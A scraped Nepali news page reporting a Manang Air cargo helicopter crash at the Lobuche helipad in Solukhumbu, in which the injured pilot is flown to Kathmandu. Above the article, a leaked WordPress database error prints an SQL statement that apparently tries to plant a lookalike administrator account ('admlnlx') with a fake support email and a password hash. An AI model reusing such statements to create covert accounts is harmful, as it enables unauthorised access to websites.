WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFyeWcz3PhuFbVeLAZ4/Y5GeeIZKb..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 15:50:22', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बु जिल्लाको खुम्बु पासाङल्यमु गाउँपालिका वडा न ४ लबुचेमा हेलिकप्टर दुर्घटना भएको छ ।कार्गोको सामन लिएर आज बिहान अन्दाजी ७:३० बजे लबुचे हेलिप्याडमा अवतर्न गर्ने क्रममा मनाङ एयरको नाइन एनएनजे कलसाइ हेलिकप्टर दुर्घटना भएको हो ।
४ हजार ९ सय मिटरको उचाईमा रहेको उक्त हेलिप्याडमा हेलि ल्यान्ड गर्ने क्रममा दुर्घटना भएको हुन सक्ने खुम्बु पासाङ ल्हामु गाउँपालिका अध्यक्ष मिङ्मा छिरी शेर्पाले बताए ।
दुर्घटनामा घाइते पाइलटको उद्वार गरि थप उपचार्को लागि काठमाण्डौ लगिएको खुम्बु पासाङल्यामु गाउपालिका प्रशासकिय प्रमुख कल्पना दाहाले बताए ।